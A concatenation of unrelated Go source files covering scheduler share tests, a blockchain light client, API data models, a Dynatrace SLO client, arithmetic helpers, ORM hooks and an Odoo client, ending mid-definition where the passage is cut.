// Test_SliceResourceWithLimits_SchedulingShareMatchesAdjusted_WhenNoQueuesAtLimit
// verifies that when no queue hits its scheduling limit, the adjusted share
// equals the scheduling share for every queue.
func Test_SliceResourceWithLimits_SchedulingShareMatchesAdjusted_WhenNoQueuesAtLimit(t *testing.T) {
	q1 := &api.Queue{Name: "q1"}
	q2 := &api.Queue{Name: "q2"}
	q3 := &api.Queue{Name: "q3"}
	cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("1"), "memory": resource.MustParse("1Gi")}
	noResources := common.ComputeResources{}
	queuePriorities := map[*api.Queue]QueuePriorityInfo{
		q1: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
		q2: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
		q3: {Priority: 1, CurrentUsage: noResources},  // queue usage is 0
	}
	resourceToSlice := common.ComputeResources{"cpu": resource.MustParse("8")}.AsFloat()
	queueSchedulingInfo := map[*api.Queue]*QueueSchedulingInfo{
		q1: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
		q2: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
		q3: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
	}
	slices := SliceResourceWithLimits(scarcity, queueSchedulingInfo, queuePriorities, resourceToSlice)
	// resulting usage ratio should be 4 : 4 : 4
	twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
	fourCpu := common.ComputeResourcesFloat{"cpu": 4.0}
	// assert.Equal takes (t, expected, actual); previously reversed.
	assert.Equal(t, twoCpu, slices[q1].schedulingShare)
	assert.Equal(t, twoCpu, slices[q1].adjustedShare)
	assert.Equal(t, twoCpu, slices[q2].schedulingShare)
	assert.Equal(t, twoCpu, slices[q2].adjustedShare)
	assert.Equal(t, fourCpu, slices[q3].schedulingShare)
	assert.Equal(t, fourCpu, slices[q3].adjustedShare)
}
// Test_SliceResourceWithLimits_SchedulingShareCorrespondsWithPriority verifies
// that equal-priority queues receive equal scheduling shares regardless of
// their individual limits.
func Test_SliceResourceWithLimits_SchedulingShareCorrespondsWithPriority(t *testing.T) {
	q1 := &api.Queue{Name: "q1"}
	q2 := &api.Queue{Name: "q2"}
	cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("1"), "memory": resource.MustParse("1Gi")}
	queuePriorities := map[*api.Queue]QueuePriorityInfo{
		q1: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
		q2: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
	}
	twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
	fourCpu := common.ComputeResourcesFloat{"cpu": 4.0}
	resourceToSlice := common.ComputeResourcesFloat{"cpu": 8.0}
	queueSchedulingInfo := map[*api.Queue]*QueueSchedulingInfo{
		q1: {remainingSchedulingLimit: twoCpu, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
		q2: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
	}
	slices := SliceResourceWithLimits(scarcity, queueSchedulingInfo, queuePriorities, resourceToSlice)
	// Both queues have the same priority so should have the same scheduling share.
	// assert.Equal takes (t, expected, actual); previously reversed.
	assert.Equal(t, fourCpu, slices[q1].schedulingShare)
	assert.Equal(t, fourCpu, slices[q2].schedulingShare)
}
// Test_SliceResourceWithLimits_AdjustedShare verifies that the adjusted share
// is capped by a queue's remaining scheduling limit.
func Test_SliceResourceWithLimits_AdjustedShare(t *testing.T) {
	q1 := &api.Queue{Name: "q1"}
	q2 := &api.Queue{Name: "q2"}
	cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("1"), "memory": resource.MustParse("1Gi")}
	queuePriorities := map[*api.Queue]QueuePriorityInfo{
		q1: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
		q2: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
	}
	twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
	fourCpu := common.ComputeResourcesFloat{"cpu": 4.0}
	resourceToSlice := common.ComputeResourcesFloat{"cpu": 8.0}
	queueSchedulingInfo := map[*api.Queue]*QueueSchedulingInfo{
		q1: {remainingSchedulingLimit: twoCpu, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
		q2: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
	}
	slices := SliceResourceWithLimits(scarcity, queueSchedulingInfo, queuePriorities, resourceToSlice)
	// Both queues have the same priority however q1 is limited to 2cpu.
	// assert.Equal takes (t, expected, actual); previously reversed.
	assert.Equal(t, twoCpu, slices[q1].adjustedShare)
	assert.Equal(t, fourCpu, slices[q2].adjustedShare)
}
// TestQueueSchedulingInfo_UpdateLimits verifies that allocating one CPU
// reduces the remaining limit and both shares by that amount.
func TestQueueSchedulingInfo_UpdateLimits(t *testing.T) {
	oneCpu := common.ComputeResourcesFloat{"cpu": 1.0}
	twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
	data := NewQueueSchedulingInfo(twoCpu, twoCpu, twoCpu)
	data.UpdateLimits(oneCpu)
	// assert.Equal takes (t, expected, actual); previously reversed.
	assert.Equal(t, oneCpu, data.remainingSchedulingLimit)
	assert.Equal(t, oneCpu, data.schedulingShare)
	assert.Equal(t, oneCpu, data.adjustedShare)
}
// TestQueueSchedulingInfo_UpdateLimits_AdjustedLowerThanSchedulingShare checks
// the proportional reduction when the adjusted share starts below the
// scheduling share.
func TestQueueSchedulingInfo_UpdateLimits_AdjustedLowerThanSchedulingShare(t *testing.T) {
	fiveCpu := common.ComputeResourcesFloat{"cpu": 5.0}
	tenCpu := common.ComputeResourcesFloat{"cpu": 10.0}
	data := NewQueueSchedulingInfo(tenCpu, tenCpu, fiveCpu)
	data.UpdateLimits(common.ComputeResourcesFloat{"cpu": 1.0})
	// assert.Equal takes (t, expected, actual); previously reversed.
	assert.Equal(t, common.ComputeResourcesFloat{"cpu": 9.0}, data.remainingSchedulingLimit)
	assert.Equal(t, common.ComputeResourcesFloat{"cpu": 8.0}, data.schedulingShare)
	assert.Equal(t, common.ComputeResourcesFloat{"cpu": 4.0}, data.adjustedShare)
}
// TestQueueSchedulingInfo_UpdateLimits_AdjustedHigherThanSchedulingShare checks
// the proportional reduction when the adjusted share starts above the
// scheduling share.
func TestQueueSchedulingInfo_UpdateLimits_AdjustedHigherThanSchedulingShare(t *testing.T) {
	fiveCpu := common.ComputeResourcesFloat{"cpu": 5.0}
	tenCpu := common.ComputeResourcesFloat{"cpu": 10.0}
	data := NewQueueSchedulingInfo(tenCpu, fiveCpu, tenCpu)
	data.UpdateLimits(common.ComputeResourcesFloat{"cpu": 2.0})
	// assert.Equal takes (t, expected, actual); previously reversed.
	assert.Equal(t, common.ComputeResourcesFloat{"cpu": 8.0}, data.remainingSchedulingLimit)
	assert.Equal(t, common.ComputeResourcesFloat{"cpu": 4.0}, data.schedulingShare)
	assert.Equal(t, common.ComputeResourcesFloat{"cpu": 8.0}, data.adjustedShare)
}
// TestQueueSchedulingInfo_UpdateLimits_ValuesLimitedAt0 verifies that limits
// and shares are clamped at zero when the allocation exceeds them.
func TestQueueSchedulingInfo_UpdateLimits_ValuesLimitedAt0(t *testing.T) {
	oneCpu := common.ComputeResourcesFloat{"cpu": 1.0}
	twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
	data := NewQueueSchedulingInfo(oneCpu, oneCpu, oneCpu)
	data.UpdateLimits(twoCpu)
	// assert.Equal takes (t, expected, actual); previously reversed.
	assert.Equal(t, common.ComputeResourcesFloat{"cpu": 0.0}, data.remainingSchedulingLimit)
	assert.Equal(t, common.ComputeResourcesFloat{"cpu": 0.0}, data.schedulingShare)
	assert.Equal(t, common.ComputeResourcesFloat{"cpu": 0.0}, data.adjustedShare)
}
|
package bsc
import (
commitmenttypes "github.com/bianjieai/tibc-sdk-go/commitment"
tibctypes "github.com/bianjieai/tibc-sdk-go/types"
)
// Compile-time check that ClientState satisfies tibctypes.ClientState.
var _ tibctypes.ClientState = (*ClientState)(nil)

// ClientType returns the client type identifier for the BSC light client.
func (m ClientState) ClientType() string {
	return "008-bsc"
}
// GetLatestHeight returns the height of the client's current header.
func (m ClientState) GetLatestHeight() tibctypes.Height {
	return m.Header.Height
}
// Validate performs basic validation by delegating to the header's
// ValidateBasic check.
func (m ClientState) Validate() error {
	return m.Header.ValidateBasic()
}
// GetDelayTime returns the confirmation delay expressed as time:
// (2/3 of the validators + 1) block intervals. The unit depends on
// BlockInteval (presumably seconds — confirm). Note the field name's
// spelling ("Inteval") comes from the generated type.
func (m ClientState) GetDelayTime() uint64 {
	return uint64(2*len(m.Validators)/3+1) * m.BlockInteval
}
// GetDelayBlock returns the confirmation delay expressed in blocks:
// 2/3 of the validators + 1.
func (m ClientState) GetDelayBlock() uint64 {
	return uint64(2*len(m.Validators)/3 + 1)
}
// GetPrefix returns an empty merkle prefix.
func (m ClientState) GetPrefix() tibctypes.Prefix {
	return commitmenttypes.MerklePrefix{}
}
|
// Copyright 2019 The Cockroach Authors.
//
// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package testshout
import (
"context"
"os"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/cockroachdb/cockroach/pkg/util/log/logconfig"
"github.com/cockroachdb/cockroach/pkg/util/log/severity"
)
// Example_shout_before_log verifies that Shout output emitted after
// the log flags were set, but before the first log message was
// output, properly appears on stderr.
//
// This test needs to occur in its own test package where there is no
// other activity on the log flags, and no other log activity,
// otherwise the test's behavior will break on `make stress`.
func Example_shout_before_log() {
	// Set up a configuration where only WARNING or above goes to stderr.
	cfg := logconfig.DefaultConfig()
	if err := cfg.Validate(nil /* no dir */); err != nil {
		panic(err)
	}
	cfg.Sinks.Stderr.Filter = severity.WARNING
	cleanup, err := log.ApplyConfig(cfg)
	if err != nil {
		panic(err)
	}
	defer cleanup()
	// Redirect stderr to stdout so the reference output checking below
	// has something to work with.
	origStderr := log.OrigStderr
	log.OrigStderr = os.Stdout
	defer func() { log.OrigStderr = origStderr }()
	// Shout at INFO severity must reach stderr (redirected to stdout here)
	// even though the stderr sink filters at WARNING.
	log.Shout(context.Background(), severity.INFO, "hello world")
	// output:
	// *
	// * INFO: hello world
	// *
}
|
package model
// Rate is the request body for rating an item: a user's score for one item.
type Rate struct {
	User  string  `json:"user"`
	Item  string  `json:"item"`
	Score float64 `json:"score"`
}
// Recommendation is a single recommended item with its predicted score.
type Recommendation struct {
	Item  string  `json:"item"`
	Score float64 `json:"score"`
}
// Recommendations is the response listing recommendations for one user.
type Recommendations struct {
	User string           `json:"user"`
	Data []Recommendation `json:"data"`
}
// Item is a named item with a score; note the JSON field is "item".
type Item struct {
	Name  string  `json:"item"`
	Score float64 `json:"score"`
}
// PopularItems is the response listing globally popular items.
type PopularItems struct {
	Data []Item `json:"data"`
}
// Items is a list of items associated with one user.
type Items struct {
	User string `json:"user"`
	Data []Item `json:"data"`
}
// ItemProbability is the probability of a user interacting with an item.
// NOTE(review): the JSON tag "propability" is misspelled, but it is part of
// the wire format — changing it would break existing clients, so it is kept.
type ItemProbability struct {
	User        string  `json:"user"`
	Item        string  `json:"item"`
	Probability float64 `json:"propability"`
}
// ErrResponse is the error payload returned to clients: a message and a code.
type ErrResponse struct {
	Error string `json:"error"`
	Code  int    `json:"code"`
}
|
package dynatrace
import (
"encoding/json"
"fmt"
"github.com/keptn-contrib/dynatrace-service/internal/common"
"time"
)
// sloPath is the Dynatrace v2 SLO API endpoint prefix.
const sloPath = "/api/v2/slo"

// SLOResult mirrors a single SLO object as returned by the Dynatrace v2 SLO
// API. The *OLD fields map the legacy "targetSuccess"/"targetWarning"
// properties; newer responses use "target"/"warning".
type SLOResult struct {
	ID                  string  `json:"id"`
	Enabled             bool    `json:"enabled"`
	Name                string  `json:"name"`
	Description         string  `json:"description"`
	EvaluatedPercentage float64 `json:"evaluatedPercentage"`
	ErrorBudget         float64 `json:"errorBudget"`
	Status              string  `json:"status"`
	// Error carries an in-band error text; "NONE" means no error (see Get).
	Error             string  `json:"error"`
	UseRateMetric     bool    `json:"useRateMetric"`
	MetricRate        string  `json:"metricRate"`
	MetricNumerator   string  `json:"metricNumerator"`
	MetricDenominator string  `json:"metricDenominator"`
	TargetSuccessOLD  float64 `json:"targetSuccess"`
	TargetWarningOLD  float64 `json:"targetWarning"`
	Target            float64 `json:"target"`
	Warning           float64 `json:"warning"`
	EvaluationType    string  `json:"evaluationType"`
	TimeWindow        string  `json:"timeWindow"`
	Filter            string  `json:"filter"`
}
// SLOClient retrieves SLO definitions and values from the Dynatrace API.
type SLOClient struct {
	client ClientInterface
}

// NewSLOClient creates a new SLOClient using the given Dynatrace API client.
func NewSLOClient(client ClientInterface) *SLOClient {
	return &SLOClient{
		client: client,
	}
}
// Get calls the Dynatrace API to retrieve the values of the Dynatrace SLO for
// the given timeframe. It returns a SLOResult object on success, an error
// otherwise.
func (c *SLOClient) Get(sloID string, startUnix time.Time, endUnix time.Time) (*SLOResult, error) {
	body, err := c.client.Get(
		fmt.Sprintf("%s/%s?from=%s&to=%s",
			sloPath,
			sloID,
			common.TimestampToString(startUnix),
			common.TimestampToString(endUnix)))
	if err != nil {
		return nil, err
	}
	var result SLOResult
	if err := json.Unmarshal(body, &result); err != nil {
		return nil, err
	}
	// For SLOs an HTTP 200 can still carry an error text in the "error"
	// property. Since Sprint 206 the property is always present and holds
	// "NONE" when there is no actual error; older versions omit it entirely,
	// which leaves the field as the empty string. Only a non-empty value
	// other than "NONE" is a real error — previously "" was also treated as
	// a failure, breaking pre-Sprint-206 responses.
	if result.Error != "" && result.Error != "NONE" {
		return nil, fmt.Errorf("dynatrace API returned an error: %s", result.Error)
	}
	return &result, nil
}
|
package arithmetic
import (
"fmt"
)
// mustBeUnique ensures a label is not registered in the functions, variables
// or aliases registries; it panics when the label is already taken.
func mustBeUnique(label string) {
	if _, isFunction := functions[label]; isFunction {
		panic(fmt.Sprintf("%s already defined as function", label))
	}
	if _, isVariable := variables[label]; isVariable {
		panic(fmt.Sprintf("%s already defined as variable", label))
	}
	if _, isAlias := aliases[label]; isAlias {
		panic(fmt.Sprintf("%s already defined as alias", label))
	}
}
// leftError returns the error triggered by an invalid left operand.
func leftError(o fmt.Stringer, v interface{}) error {
return fmt.Errorf("invalid operation: \"%s %v\" must be preceeded by a valid operand or expression", o, v)
}
// rightError returns the error triggered by an invalid right operand.
// (The comment previously said "leftError" — copy-paste slip.)
func rightError(o fmt.Stringer) error {
	return fmt.Errorf("invalid operation: \"%s\" must be followed by a valid operand or expression", o)
}
// invalidExpressionError returns the error triggered by an invalid expression.
func invalidExpressionError(o fmt.Stringer, left, right interface{}) error {
return fmt.Errorf("invalid expression %v %s %v", left, o, right)
}
// eq checks if o1 and o2 are equal. It converts types: two float-convertible
// values compare as floats, two bool-convertible values compare as bools, and
// everything else falls back to interface equality.
func eq(o1, o2 interface{}) bool {
	f1, ok1 := ToFloat(o1)
	f2, ok2 := ToFloat(o2)
	if ok1 && ok2 {
		return f1 == f2
	}
	b1, ok1 := ToBool(o1)
	b2, ok2 := ToBool(o2)
	// BUG fix: the second result was previously assigned to ok1 ("b2, ok1 :="),
	// so the check below compared against the stale float ok2 and two
	// bool-valued variables were never compared by their boolean values.
	if ok1 && ok2 {
		return b1 == b2
	}
	return o1 == o2
}
// gt reports whether o1 is greater than o2. It converts types; the second
// return value is false when either operand cannot be converted to a float.
// (The comment previously said "eq" — copy-paste slip.)
func gt(o1, o2 interface{}) (bool, bool) {
	f1, ok := ToFloat(o1)
	if !ok {
		return false, false
	}
	f2, ok := ToFloat(o2)
	if !ok {
		return false, false
	}
	return f1 > f2, true
}
// floatToInt transforms a float to an int if the decimal part of the float
// is 0; the second return value reports whether the conversion was exact.
func floatToInt(o float64) (int, bool) {
	truncated := int(o)
	if float64(truncated) != o {
		return 0, false
	}
	return truncated, true
}
// ToFloat casts the input into a float. This helper should be used in the
// custom funcs to use both floats and named variables (such as "e").
func ToFloat(val interface{}) (float64, bool) {
	if f, ok := val.(float64); ok {
		return f, true
	}
	if v, ok := val.(variable); ok {
		f, ok := v.value.(float64)
		return f, ok
	}
	return 0, false
}
// ToBool casts the input into a bool. This helper should be used in the
// custom funcs to use both bools and named variables (such as "true").
func ToBool(val interface{}) (bool, bool) {
	if b, ok := val.(bool); ok {
		return b, true
	}
	if v, ok := val.(variable); ok {
		b, ok := v.value.(bool)
		return b, ok
	}
	return false, false
}
|
package model
import (
"github.com/jinzhu/gorm"
"time"
)
// Content is the content model, backed by the b_content table.
type Content struct {
	Id         int        `gorm:"PRIMARY_KEY" json:"id" uri:"id"` // identifier
	CategoryId int        `json:"category_id"`                    // category identifier
	Title      string     `json:"title"`                          // title
	Body       string     `json:"body"`                           // body text
	CreatedAt  *Time      `json:"created_at"`                     // creation time
	UpdatedAt  *Time      `json:"updated_at"`                     // last-modification time
	DeletedAt  *time.Time `json:"deleted_at"`                     // soft-delete time
	Category   Category   `json:"category" gorm:"FOREIGNKEY:category_id;ASSOCIATION_FOREIGNKEY:id"` // associated category
}
// TableName maps Content to the "b_content" database table.
func (Content) TableName() string {
	return "b_content"
}
// AfterFind is the gorm hook run after a query; currently a no-op.
func (this *Content) AfterFind(scope *gorm.Scope) error {
	return nil
}

// BeforeCreate is the gorm hook run before insertion; currently a no-op.
func (this *Content) BeforeCreate(scope *gorm.Scope) error {
	return nil
}

// AfterCreate is the gorm hook run after insertion; currently a no-op.
func (this *Content) AfterCreate(scope *gorm.Scope) error {
	return nil
}

// BeforeUpdate is the gorm hook run before an update; currently a no-op.
func (this *Content) BeforeUpdate(scope *gorm.Scope) error {
	return nil
}

// AfterUpdate is the gorm hook run after an update; currently a no-op.
func (this *Content) AfterUpdate(scope *gorm.Scope) error {
	return nil
}

// BeforeDelete is the gorm hook run before deletion; currently a no-op.
func (this *Content) BeforeDelete(scope *gorm.Scope) error {
	return nil
}

// AfterDelete is the gorm hook run after deletion; currently a no-op.
func (this *Content) AfterDelete(scope *gorm.Scope) error {
	return nil
}
|
package models
// EntitySummary is a compact view of a catalog entity: its identifiers,
// display name, type, and related links.
type EntitySummary struct {
	CatalogItemId string         `json:"catalogItemId"`
	Name          string         `json:"name"`
	Links         map[string]URI `json:"links"`
	Id            string         `json:"id"`
	Type          string         `json:"type"`
}
|
package set_test
import (
//"testing"
"log"
"math/rand"
"os"
"github.com/lleo/go-functional-collections/key"
"github.com/lleo/go-functional-collections/set"
"github.com/lleo/stringutil"
"github.com/pkg/errors"
)
// init redirects the standard logger to a fresh "test.log" file and enables
// short file/line prefixes. log.Fatal aborts the test binary if the log file
// cannot be created.
func init() {
	log.SetFlags(log.Lshortfile)
	var logFileName = "test.log"
	var logFile, err = os.Create(logFileName)
	if err != nil {
		log.Fatal(errors.Wrapf(err, "failed to os.Create(%q)", logFileName))
	}
	log.SetOutput(logFile)
}
// Inc lexicographically increments a lowercase string key ("a" -> "b", ...).
var Inc = stringutil.Lower.Inc

//type StringKey = key.Str
// buildKeys generates num sequential string keys starting from "a".
func buildKeys(num int) []key.Hash {
	keys := make([]key.Hash, num)
	s := "a"
	for i := range keys {
		keys[i] = key.Str(s)
		s = Inc(s)
	}
	return keys
}
// buildKeysByN generates num keys, advancing the underlying string by n
// increments between consecutive keys.
func buildKeysByN(num int, n int) []key.Hash {
	keys := make([]key.Hash, num)
	s := "a"
	for i := range keys {
		keys[i] = key.Str(s)
		for skip := 0; skip < n; skip++ {
			s = Inc(s)
		}
	}
	return keys
}
// buildStrings generates num sequential strings starting from "a".
func buildStrings(num int) []string {
	strs := make([]string, num)
	s := "a"
	for i := range strs {
		strs[i] = s
		s = Inc(s)
	}
	return strs
}
// buildKeysFromStrings wraps each string in a key.Str hashable key.
func buildKeysFromStrings(strs []string) []key.Hash {
	keys := make([]key.Hash, len(strs))
	for i, s := range strs {
		keys[i] = key.Str(s)
	}
	return keys
}
// randomizeKeys returns a copy of keys in uniformly random order, leaving the
// input slice untouched.
func randomizeKeys(keys []key.Hash) []key.Hash {
	randKeys := make([]key.Hash, len(keys))
	copy(randKeys, keys)
	// rand.Shuffle performs the same Fisher–Yates shuffle the previous
	// hand-rolled loop implemented.
	rand.Shuffle(len(randKeys), func(i, j int) {
		randKeys[i], randKeys[j] = randKeys[j], randKeys[i]
	})
	return randKeys
}
// buildSet inserts every key into a fresh persistent set and returns it.
func buildSet(keys []key.Hash) *set.Set {
	s := set.New()
	for _, k := range keys {
		s = s.Set(k)
	}
	return s
}
|
package scanner
import (
"crypto/sha256"
"regexp"
"github.com/MagalixCorp/magalix-agent/v2/proto"
"github.com/MagalixTechnologies/uuid-go"
kv1 "k8s.io/api/core/v1"
)
// Entity is the basic entity structure; it can be an application, a service
// or a container. ID is derived from the name and the parent's id (see
// Identify).
type Entity struct {
	ID          uuid.UUID
	Name        string
	Kind        string
	Annotations map[string]string
}
// Identify sets the id of the entity, derived deterministically from its
// name and the id of its parent. (The doc comment previously referred to
// IdentifyEntity, the helper this method delegates to.)
func (entity *Entity) Identify(parent uuid.UUID) error {
	var err error
	entity.ID, err = IdentifyEntity(entity.Name, parent)
	// Returning err directly replaces the previous
	// "if err != nil { return err }; return nil" boilerplate.
	return err
}
// Application is an abstraction layer representing a namespace, together
// with its services and the namespace's limit ranges.
type Application struct {
	Entity
	Services    []*Service
	LimitRanges []kv1.LimitRange
}
// Service is an abstraction layer representing a service:
// it can be a deployment, replicaset, statefulset, daemonset,
// job, cronjob or an orphan pod. PodRegexp matches the names of the pods
// belonging to this service.
type Service struct {
	Entity
	PodRegexp      *regexp.Regexp
	ReplicasStatus proto.ReplicasStatus
	Containers     []*Container
}
// Container represents a single container controlled by a service;
// if the container belongs to a pod with no controller, an orphaned-pod
// service automatically gets created as a parent.
type Container struct {
	Entity
	Image          string
	Resources      *proto.ContainerResourceRequirements `json:"resources"`
	LivenessProbe  *kv1.Probe
	ReadinessProbe *kv1.Probe
}
// IdentifyEntity derives a deterministic UUID for target under parent by
// hashing the parent id concatenated with the target name.
func IdentifyEntity(target string, parent uuid.UUID) (uuid.UUID, error) {
	data := append(parent.Bytes(), target...)
	sum := sha256.Sum256(data)
	return uuid.FromBytes(sum[:uuid.Size])
}
|
package models
import (
"testing"
)
// TestLog smoke-tests the shared logger at every level; it only verifies
// that logging does not panic — the output itself is not asserted.
func TestLog(t *testing.T) {
	Logs().Debug("Testlog debug")
	Logs().Info("Testlog Info")
	Logs().Warn("Testlog warning...")
	Logs().Error("Testlog Error...")
}
|
/**
* Copyright (c) 2018-present, MultiVAC Foundation.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
package mvvm
import (
"math"
"github.com/perlin-network/life/compiler"
)
var (
	// mvvmGasPolicy is the gas policy for MVVM.
	//
	// By default, assume that each single step consumes the unit gas fee.
	mvvmGasPolicy = &compiler.SimpleGasPolicy{GasPerInstruction: 1}
	// mvvmDefaultGasLimit is the default gas limit for MVVM.
	//
	// Mostly, it is assumed that the developer will give a user-defined gas
	// limit. But if the limit is not assigned, mvvmDefaultGasLimit is used
	// as the limit value.
	// For now the value is set as 65535. Deeper discussion is needed.
	// Note that mvvmDefaultGasLimit must be > 0: if it were <= 0, the gas
	// fee could never be exceeded.
	mvvmDefaultGasLimit int64 = 1<<16 - 1
	// mvvmMaxGasLimit is the maximum gas limit for MVVM.
	//
	// The MTV Coin value cost for gas is a big.Int, which is sometimes much
	// bigger than the gas limit for life. Hence it is assumed that if the
	// coin value is bigger than mvvmDefaultGasLimit, the gas limit is the
	// maximum limit. For now this value is set as the maximum value of int64.
	mvvmMaxGasLimit int64 = math.MaxInt64
)
|
package odoo
import (
"fmt"
)
// ImLivechatReportOperator represents im_livechat.report.operator model.
// NOTE(review): the tag option "omptempty" looks like a misspelling of
// "omitempty"; it is kept as-is because the same spelling is used across the
// generated package — confirm what the xmlrpc marshaller actually honours
// before changing it.
type ImLivechatReportOperator struct {
	LastUpdate        *Time     `xmlrpc:"__last_update,omptempty"`
	ChannelId         *Many2One `xmlrpc:"channel_id,omptempty"`
	DisplayName       *String   `xmlrpc:"display_name,omptempty"`
	Duration          *Float    `xmlrpc:"duration,omptempty"`
	Id                *Int      `xmlrpc:"id,omptempty"`
	LivechatChannelId *Many2One `xmlrpc:"livechat_channel_id,omptempty"`
	NbrChannel        *Int      `xmlrpc:"nbr_channel,omptempty"`
	PartnerId         *Many2One `xmlrpc:"partner_id,omptempty"`
	StartDate         *Time     `xmlrpc:"start_date,omptempty"`
	TimeToAnswer      *Float    `xmlrpc:"time_to_answer,omptempty"`
}
// ImLivechatReportOperators represents an array of im_livechat.report.operator model records.
type ImLivechatReportOperators []ImLivechatReportOperator

// ImLivechatReportOperatorModel is the odoo model name.
const ImLivechatReportOperatorModel = "im_livechat.report.operator"
// Many2One converts an ImLivechatReportOperator to a *Many2One reference
// built from its id.
func (iro *ImLivechatReportOperator) Many2One() *Many2One {
	return NewMany2One(iro.Id.Get(), "")
}
// CreateImLivechatReportOperator creates a new im_livechat.report.operator model and returns its id.
// A result of (-1, nil) means the server reported success but returned no id.
func (c *Client) CreateImLivechatReportOperator(iro *ImLivechatReportOperator) (int64, error) {
	ids, err := c.CreateImLivechatReportOperators([]*ImLivechatReportOperator{iro})
	if err != nil {
		return -1, err
	}
	if len(ids) == 0 {
		return -1, nil
	}
	return ids[0], nil
}
// CreateImLivechatReportOperators creates new im_livechat.report.operator
// models and returns their ids. (The doc comment previously duplicated the
// singular function's name.)
func (c *Client) CreateImLivechatReportOperators(iros []*ImLivechatReportOperator) ([]int64, error) {
	var vv []interface{}
	for _, v := range iros {
		vv = append(vv, v)
	}
	return c.Create(ImLivechatReportOperatorModel, vv)
}
// UpdateImLivechatReportOperator updates an existing im_livechat.report.operator record
// identified by iro's own id.
func (c *Client) UpdateImLivechatReportOperator(iro *ImLivechatReportOperator) error {
	return c.UpdateImLivechatReportOperators([]int64{iro.Id.Get()}, iro)
}
// UpdateImLivechatReportOperators updates existing im_livechat.report.operator records.
// All records (represented by ids) will be updated by iro values.
func (c *Client) UpdateImLivechatReportOperators(ids []int64, iro *ImLivechatReportOperator) error {
	return c.Update(ImLivechatReportOperatorModel, ids, iro)
}
// DeleteImLivechatReportOperator deletes an existing im_livechat.report.operator record by id.
func (c *Client) DeleteImLivechatReportOperator(id int64) error {
	return c.DeleteImLivechatReportOperators([]int64{id})
}
// DeleteImLivechatReportOperators deletes existing im_livechat.report.operator records by ids.
func (c *Client) DeleteImLivechatReportOperators(ids []int64) error {
	return c.Delete(ImLivechatReportOperatorModel, ids)
}
// GetImLivechatReportOperator gets an existing im_livechat.report.operator record by id.
// It returns an error when the id does not exist.
func (c *Client) GetImLivechatReportOperator(id int64) (*ImLivechatReportOperator, error) {
	iros, err := c.GetImLivechatReportOperators([]int64{id})
	if err != nil {
		return nil, err
	}
	if iros != nil && len(*iros) > 0 {
		return &((*iros)[0]), nil
	}
	return nil, fmt.Errorf("id %v of im_livechat.report.operator not found", id)
}
// GetImLivechatReportOperators gets existing im_livechat.report.operator records by ids.
func (c *Client) GetImLivechatReportOperators(ids []int64) (*ImLivechatReportOperators, error) {
	iros := &ImLivechatReportOperators{}
	if err := c.Read(ImLivechatReportOperatorModel, ids, nil, iros); err != nil {
		return nil, err
	}
	return iros, nil
}
// FindImLivechatReportOperator searches for the first im_livechat.report.operator
// record matching criteria (the search is limited to one result).
func (c *Client) FindImLivechatReportOperator(criteria *Criteria) (*ImLivechatReportOperator, error) {
	result := &ImLivechatReportOperators{}
	if err := c.SearchRead(ImLivechatReportOperatorModel, criteria, NewOptions().Limit(1), result); err != nil {
		return nil, err
	}
	if len(*result) == 0 {
		return nil, fmt.Errorf("im_livechat.report.operator was not found with criteria %v", criteria)
	}
	return &((*result)[0]), nil
}
// FindImLivechatReportOperators searches for all im_livechat.report.operator
// records matching criteria, filtered by options.
func (c *Client) FindImLivechatReportOperators(criteria *Criteria, options *Options) (*ImLivechatReportOperators, error) {
	result := &ImLivechatReportOperators{}
	err := c.SearchRead(ImLivechatReportOperatorModel, criteria, options, result)
	if err != nil {
		return nil, err
	}
	return result, nil
}
// FindImLivechatReportOperatorIds searches for the ids of all
// im_livechat.report.operator records matching criteria and options.
func (c *Client) FindImLivechatReportOperatorIds(criteria *Criteria, options *Options) ([]int64, error) {
	ids, err := c.Search(ImLivechatReportOperatorModel, criteria, options)
	if err == nil {
		return ids, nil
	}
	return []int64{}, err
}
// FindImLivechatReportOperatorId searches for the id of the first
// im_livechat.report.operator record matching criteria and options.
func (c *Client) FindImLivechatReportOperatorId(criteria *Criteria, options *Options) (int64, error) {
	ids, err := c.Search(ImLivechatReportOperatorModel, criteria, options)
	switch {
	case err != nil:
		return -1, err
	case len(ids) == 0:
		return -1, fmt.Errorf("im_livechat.report.operator was not found with criteria %v and options %v", criteria, options)
	default:
		return ids[0], nil
	}
}
|
package exec
import (
"github.com/cockroachdb/cockroach/pkg/sql/coltypes"
"github.com/cockroachdb/cockroach/pkg/sql/sem/tree"
"github.com/petermattis/opttoy/v4/cat"
)
// createTable builds a cat.Table from a CREATE TABLE statement and registers
// it in the catalog.
type createTable struct {
	catalog *cat.Catalog // catalog the new table is added to and FK targets resolved against
